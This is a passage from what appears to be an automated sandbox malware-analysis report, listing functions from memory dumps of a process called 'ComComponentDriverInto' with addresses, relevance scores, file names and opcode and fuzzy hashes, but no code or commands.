                                                            • Instruction Fuzzy Hash: 4E21F931E0991D9FDF98DB58C465AADB7B5FF68300F0141AE900EE72A1CE35AA41CF40
                                                            Function 00007FFD9BEB3130 Relevance: .7, Instructions: 679COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37280205020ad5bb76a04d1bd16f342d5b9fec65391039230ad2121400d668d5
                                                            • Instruction ID: 56d1598f5d31eafab3bc8fc11ba74087c42ddb51e00c00b443aaeba80ff160a7
                                                            • Opcode Fuzzy Hash: 37280205020ad5bb76a04d1bd16f342d5b9fec65391039230ad2121400d668d5
                                                            • Instruction Fuzzy Hash: 1422D730B09A2D8FDBA9DB48C866A7973E5FF54311B1101BAD01EC72A6DE25ED45CF80
                                                            Function 00007FFD9BEBB481 Relevance: .5, Instructions: 509COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4246d5d89b295d61ed945d3d704635ca7adadea69b19501a51076cc758fe8be3
                                                            • Instruction ID: 123c90f5dbdbfd4f92c06bb192b0e02a85e6dc388aaf193d40ac4889c864ab22
                                                            • Opcode Fuzzy Hash: 4246d5d89b295d61ed945d3d704635ca7adadea69b19501a51076cc758fe8be3
                                                            • Instruction Fuzzy Hash: BC02E334A0EA6E8FE778DBA5D4A057977E5FF44300B11057EC04EC76A2DE2AB941CB81
                                                            Function 00007FFD9BEB6477 Relevance: .4, Instructions: 396COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dbdc2c6b8d34034d01292b7e129314c4d74b0f04cd4eb282d642057770e4b66
                                                            • Instruction ID: 5f512dc5b9230cf33da40392aa5e1a3ee8949bfea5c2058ee8cc28cb6bc6f2e3
                                                            • Opcode Fuzzy Hash: 8dbdc2c6b8d34034d01292b7e129314c4d74b0f04cd4eb282d642057770e4b66
                                                            • Instruction Fuzzy Hash: 05D11430A0EB6A8FD379CB69D4A0475B7E4FF45304B1505BEC08AC75A6DE2AF9428B41
                                                            Function 00007FFD9BEB4CC2 Relevance: .3, Instructions: 334COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58d2b4bdd2f25a969bbf7763beeca547e6462c3deac326a6af1a56c14a871cde
                                                            • Instruction ID: c9d9727c41b3fdac90c4ce53878fcf9857a56a8989e4eb6b3cd879cd257ba2ac
                                                            • Opcode Fuzzy Hash: 58d2b4bdd2f25a969bbf7763beeca547e6462c3deac326a6af1a56c14a871cde
                                                            • Instruction Fuzzy Hash: 64C1D430A0EA5A4FE759DB99C0A06A4B7B5FF59300F4541BDC04ECBA96CB29F951CB80
                                                            Function 00007FFD9BEBF272 Relevance: .3, Instructions: 326COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6d0a9420624e7f3574bf1e87af3e46343ed3fb480c2ea116189c09313a1b777
                                                            • Instruction ID: 3e6e6c363e2549fd47945c941f32ec5dced05a0095326a948212034b42f107da
                                                            • Opcode Fuzzy Hash: b6d0a9420624e7f3574bf1e87af3e46343ed3fb480c2ea116189c09313a1b777
                                                            • Instruction Fuzzy Hash: 69C10530B0AA4A8FE759DF69C0A16B477A5FF08310F15417DD04EC7A96CB29B951CBC0
                                                            Function 00007FFD9BEB9CF2 Relevance: .3, Instructions: 324COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba375be859d6d663632337e47bfa8c9bee09aa54004961f50c35ec466b3cb39f
                                                            • Instruction ID: a13d4bb83b1706c3da285e1462c9fc672ecf98faf058436023b904943b099fe9
                                                            • Opcode Fuzzy Hash: ba375be859d6d663632337e47bfa8c9bee09aa54004961f50c35ec466b3cb39f
                                                            • Instruction Fuzzy Hash: 7DC11030B0AA5A8FE759DBA9C0A46B4B7A4FF18310F454179D04EC7AD6CB29B951CB80
                                                            Function 00007FFD9BEBCBB5 Relevance: .3, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a943822939800326a49ae76cdc8c1e03c485ac1da069391d090af763ff2aac8
                                                            • Instruction ID: 4c09b7a11409ef9d5e13323c4351c464167df4e7280bcf544a37f9a1dc54e5ad
                                                            • Opcode Fuzzy Hash: 1a943822939800326a49ae76cdc8c1e03c485ac1da069391d090af763ff2aac8
                                                            • Instruction Fuzzy Hash: F4210512F0F0BBCAF23892DA28B10BC56489F95321F0A0577D04E852F2DC4EBA555B82
                                                            Function 00007FFD9BEB76D7 Relevance: .3, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c336414640cf17697d84900b3da0dcd357d1531507dbb1913c0f092d77f45688
                                                            • Instruction ID: e74abf3c0ca2981a5d7348a85cb0a7550402c5a6fe6167cbd508306313fc4764
                                                            • Opcode Fuzzy Hash: c336414640cf17697d84900b3da0dcd357d1531507dbb1913c0f092d77f45688
                                                            • Instruction Fuzzy Hash: CE210412F0F2BB86F77465EA28710B816445F05735F1B06B6D45E8A8E3CC0E2A819B8A
                                                            Function 00007FFD9BEB26AD Relevance: .3, Instructions: 293COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 168fab1279e4f1d608da9474c2b3ab0a18e28c891af446a3749cb3b92deff240
                                                            • Instruction ID: 474533f288de18a923a65080c61149cdd5b2402d25eaa9e3e25c73c70a049d36
                                                            • Opcode Fuzzy Hash: 168fab1279e4f1d608da9474c2b3ab0a18e28c891af446a3749cb3b92deff240
                                                            • Instruction Fuzzy Hash: 5421F652F0F17F86F63856E778311BD6F486F54320F1A0677D04E8A1E2DC4E26916B92
                                                            Function 00007FFD9BEBA555 Relevance: .3, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff2217e283b425bf11ca934ffe5131437bfe2c47d54a480d6b6783787c80b4c7
                                                            • Instruction ID: 08cd91ba4f10355f6335d3f780cb4a10660c6ef183eb882fa80cd23abfb3f379
                                                            • Opcode Fuzzy Hash: ff2217e283b425bf11ca934ffe5131437bfe2c47d54a480d6b6783787c80b4c7
                                                            • Instruction Fuzzy Hash: 06B1C33061956A8FEB69CF48C0E05B437A5FF44310B5156BDC85ACB69BDA39F982CF80
                                                            Function 00007FFD9BEB5536 Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04d3d4b7a4f3bf31ad104d3d341218a837c711e2135b2951d721802dc911176a
                                                            • Instruction ID: 1b47d1cb9ca881a17d4d101f73a5aafb02e52ed72b30d76a9c3240abbec36caf
                                                            • Opcode Fuzzy Hash: 04d3d4b7a4f3bf31ad104d3d341218a837c711e2135b2951d721802dc911176a
                                                            • Instruction Fuzzy Hash: C5B1E23061A66A8FEB59CF58C0F05B437A5FF45310B5506BDC85B8B69BC639E981CF80
                                                            Function 00007FFD9BEBE7A6 Relevance: .3, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60fb0530b6fbede7306c66b6bb437193b70dd947833021fbdee9b5bd8070406e
                                                            • Instruction ID: 0d12d2a0c8a6d6ec091f3cf9716a8a5b55fe6a8cea34361146e050859795b671
                                                            • Opcode Fuzzy Hash: 60fb0530b6fbede7306c66b6bb437193b70dd947833021fbdee9b5bd8070406e
                                                            • Instruction Fuzzy Hash: EA817C31B0EB6A4FE3F85A69946117977E4FF45310B1509BFE08EC71A3CE2AB5068B41
                                                            Function 00007FFD9BEB9226 Relevance: .3, Instructions: 280COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0a0ca651c318891d745bf9f5d88705cb2f1a111343c78705b6b49e9f2218041
                                                            • Instruction ID: 4cdc3f7413400713500d32eabffabc440b2afd393bf382c0c7e35828a5c3bc88
                                                            • Opcode Fuzzy Hash: a0a0ca651c318891d745bf9f5d88705cb2f1a111343c78705b6b49e9f2218041
                                                            • Instruction Fuzzy Hash: 24916A31F0E75A4FE33D5A69946917977E4EF86310B16017EE08EC71E3CE2AB9028B41
                                                            Function 00007FFD9BEB26D4 Relevance: .3, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d87905e39b0fd68ae546f8f385653b928a8c7c65d9a580c6a61f9ecbae59780b
                                                            • Instruction ID: 5a50bd1a51eec2cb3663e9c1432d8af228dcdaf56e725e214e85c6abde9acaaf
                                                            • Opcode Fuzzy Hash: d87905e39b0fd68ae546f8f385653b928a8c7c65d9a580c6a61f9ecbae59780b
                                                            • Instruction Fuzzy Hash: BE11C412F0F5BF86F63951E7383517D5F446F55320F1A02BAD48D8A0E7DC4E2A816B92
                                                            Function 00007FFD9BEB41F6 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a2055d6a8d9ec42e8913a76da3d6b36ec564574c7e3a5890f5c0209044e70a7
                                                            • Instruction ID: 63461f2354bf20d1ebe4fcc74085246fbc0f98da77882f6a5a5492820d151174
                                                            • Opcode Fuzzy Hash: 8a2055d6a8d9ec42e8913a76da3d6b36ec564574c7e3a5890f5c0209044e70a7
                                                            • Instruction Fuzzy Hash: 8F817B32B0E61A4FE33C9A59946547977F4FF85311B16047ED48FC72A3CE2AB9428B42
                                                            Function 00007FFD9BEBCC37 Relevance: .3, Instructions: 252COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c787b26c6509c1f37f2f1b92bec94751a32fddd488df1750d33068b6e34e32b4
                                                            • Instruction ID: f0daf311aec06c90a5322f3aec7de01fbfa40f1da04fe36e6f833b89392b2705
                                                            • Opcode Fuzzy Hash: c787b26c6509c1f37f2f1b92bec94751a32fddd488df1750d33068b6e34e32b4
                                                            • Instruction Fuzzy Hash: 34110B12F0F0BBCAF339D29A28720FC55445F55321F1A05B7D04E8A2E3DC0EA6554B82
                                                            Function 00007FFD9BEBC8E9 Relevance: .2, Instructions: 248COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 60d4cf7411ef96ae2afadd4a11b15621295c7622862ea1ad359e497107bbbc0a
                                                            • Instruction ID: 9069e9c0a6d138803e2b1f58cb32c800c1709ad411fd03ebaaea5d7d7b6e8dbc
                                                            • Opcode Fuzzy Hash: 60d4cf7411ef96ae2afadd4a11b15621295c7622862ea1ad359e497107bbbc0a
                                                            • Instruction Fuzzy Hash: 49713C71B0E45E4FF778DA5988665B437C4FF44310B1602BAD09FC77B2DE19AA0A8B81
                                                            Function 00007FFD9BEB0729 Relevance: .2, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0f6984f5b31d537a528b7ec4baa9235d7529663579544d128069dda9c6d6744
                                                            • Instruction ID: 281c30a09c9a723de1ece97dbcaeb4838c6cb82fdea2b9944d5d24dedab6824e
                                                            • Opcode Fuzzy Hash: f0f6984f5b31d537a528b7ec4baa9235d7529663579544d128069dda9c6d6744
                                                            • Instruction Fuzzy Hash: EF711431A0E56D4FE778EA5A88265B537C4EF44710B0602B9D09EC35B3DA1ABE068BC1
                                                            Function 00007FFD9BEB7389 Relevance: .2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e42f1b96639464847ea6ac9170e65b84d9c41581b787573e1abf78cfb80b33e8
                                                            • Instruction ID: 17fa55e9af6053fe7b11dd62806330893201b4b1c105e0bc682371206391cb63
                                                            • Opcode Fuzzy Hash: e42f1b96639464847ea6ac9170e65b84d9c41581b787573e1abf78cfb80b33e8
                                                            • Instruction Fuzzy Hash: 01717E31B0E45E4FE77CDA59C8665B43BC4FF44312B0102B9D49EC7DB2DD1AAA068B85
                                                            Function 00007FFD9BEB2359 Relevance: .2, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82c2791655489f47b791289effcc46ef7200b51b92d35c0f3715695bf65dabe8
                                                            • Instruction ID: c931e03a8e9a281a4f79ca1310486eb0c48749fc24539942bbdb101605952d98
                                                            • Opcode Fuzzy Hash: 82c2791655489f47b791289effcc46ef7200b51b92d35c0f3715695bf65dabe8
                                                            • Instruction Fuzzy Hash: C671AD31B0E45E4FE77CDAD9E8665B43BC4FF48310B010279D49EC79B2DE1AA9068B81
                                                            Function 00007FFD9BEBA45A Relevance: .2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 064f2eb6cbe16c3268ca0050dbf843a631ff8960b4724b2a1834eddcddc637fc
                                                            • Instruction ID: 416b321341e8f2e08827e9935c8e8d442709f6f1f00bbca19a59819a8d47feb1
                                                            • Opcode Fuzzy Hash: 064f2eb6cbe16c3268ca0050dbf843a631ff8960b4724b2a1834eddcddc637fc
                                                            • Instruction Fuzzy Hash: 6D81F330A0E56E8FEF2D8F58C4A45B57BA1FF41300F1545B9C44A8B59ADE38A946CB41
                                                            Function 00007FFD9BEBD4AB Relevance: .2, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11ee9b25991690d5d26932c0906425d7227a3d2bb185219ec56b9e0588f19b90
                                                            • Instruction ID: ece5064976a3a09725f684c2ee64a531504c8b0c0e4fa452bcc8fb57161e3d64
                                                            • Opcode Fuzzy Hash: 11ee9b25991690d5d26932c0906425d7227a3d2bb185219ec56b9e0588f19b90
                                                            • Instruction Fuzzy Hash: FF71E230E1E55E8EFB69DBA58864ABCBBB4FF49304F11417AD00ED71E5DE2A6941CB00
                                                            Function 00007FFD9BEB542A Relevance: .2, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 739f397bcd7d49f3573709236d436131963000fc23f3ba424a75648ef6398a87
                                                            • Instruction ID: 3bdce4f151d4ca7cc25b0c1c03718b0a1324323c74be2b2230cb1ebf786d9347
                                                            • Opcode Fuzzy Hash: 739f397bcd7d49f3573709236d436131963000fc23f3ba424a75648ef6398a87
                                                            • Instruction Fuzzy Hash: 8181F430A1A6AA8FEB2ECF54C4B15B53BE1FF41300B0945BEC44E8B19BCA29E541CF41
                                                            Function 00007FFD9BEB2F1B Relevance: .2, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f1dcb8d64fbedfe5c97fca90e552ea58d0ea360b5db85774e8c6e88535f1c28
                                                            • Instruction ID: 5a5cd38ba19c43ebec725f8aa6df4a33af0f8435fffa8d4db0bd4f12f21d2aa8
                                                            • Opcode Fuzzy Hash: 4f1dcb8d64fbedfe5c97fca90e552ea58d0ea360b5db85774e8c6e88535f1c28
                                                            • Instruction Fuzzy Hash: 8C710530F1E55E8EEBA5DBA58865ABC7BB4FF49300F1101BAD00ED71E6DE3969418B40
                                                            Function 00007FFD9BEB17B1 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22d706541dd8db4bda0e16c1f2d20a03dc5be86a6e02bd415196ccbc6ace2858
                                                            • Instruction ID: d3ab77961f3d755d0e13af6e43cf1443e622a9f8558c2955f28cafe34e7fa649
                                                            • Opcode Fuzzy Hash: 22d706541dd8db4bda0e16c1f2d20a03dc5be86a6e02bd415196ccbc6ace2858
                                                            • Instruction Fuzzy Hash: C6416D31B1E29E4FE731DB95D4616F437A4FF81320F0602B5D448CF1A7DA39AA458B92
                                                            Function 00007FFD9BEBBAA7 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3006c3d550e6e1abad1c6f60f41284946015bbedb522f83040b30ffa77aca045
                                                            • Instruction ID: 8e078c4d707e97a5516b7d35fba6d5987b6610cde3ef7735e2e0642b2d1e6516
                                                            • Opcode Fuzzy Hash: 3006c3d550e6e1abad1c6f60f41284946015bbedb522f83040b30ffa77aca045
                                                            • Instruction Fuzzy Hash: C241973260D9088FDF98EF68C4A5DA4B3E1FF68320B1405A9D14EC71D2DE31E945CB81
                                                            Function 00007FFD9BEB6A77 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15ac70c33c50815dd919e7697e5db4f9944096d3d4ce394f7f29867d531a292a
                                                            • Instruction ID: 2080b9bffc32fcebcec743ba945ca56c7ce61e0f418a6d62a0bb9c676d9e5a85
                                                            • Opcode Fuzzy Hash: 15ac70c33c50815dd919e7697e5db4f9944096d3d4ce394f7f29867d531a292a
                                                            • Instruction Fuzzy Hash: 2F41933270D9488FDF98EF58C4A5DA5B3E1FFA8321B0405AAD15EC71D2DE25E845CB81
                                                            Function 00007FFD9BAB090D Relevance: .1, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1d2727c8dd29e5a0953974ba18f7ce81592b86134df679790ad45ed79e4948a5
                                                            • Instruction ID: fae83ffa187ec46fcb2ad5ef0d6d6a61a45f774c3b50d9bcf590d16a51cb3e13
                                                            • Opcode Fuzzy Hash: 1d2727c8dd29e5a0953974ba18f7ce81592b86134df679790ad45ed79e4948a5
                                                            • Instruction Fuzzy Hash: D4315F12B0C6690EE324B3BC64B5AF97BC0DF4833AF1405BBE45ECA1E7DD046841C284
                                                            Function 00007FFD9BEBBB51 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd15315b218c1116df4f10c1eab9cab04086ca74529b86ade61f98147e2b1b41
                                                            • Instruction ID: 226cb40d67a137f33eed8348bebdbe87905b7b42009138a562632cddd8ab9bac
                                                            • Opcode Fuzzy Hash: dd15315b218c1116df4f10c1eab9cab04086ca74529b86ade61f98147e2b1b41
                                                            • Instruction Fuzzy Hash: 3831703160C9488FDF99EF28C4A5DA4B3E1FF69324B1406ADD44EC72E2DE25E845CB81
                                                            Function 00007FFD9BEB6B21 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e8b42e93f16c37e941e553459f571885a391d2f6bb2dc5769fc022aa6649d66
                                                            • Instruction ID: 2362c9490c3698db20c216888767c042974c4eb5bbe49f51bd833c9e282cc9b6
                                                            • Opcode Fuzzy Hash: 6e8b42e93f16c37e941e553459f571885a391d2f6bb2dc5769fc022aa6649d66
                                                            • Instruction Fuzzy Hash: 2131803260C9488FDF58EF18C4A5DA5B3E1FFA8311B0406AED15AC7192DE25E845CB81
                                                            Function 00007FFD9BAB0908 Relevance: .1, Instructions: 118COMMON
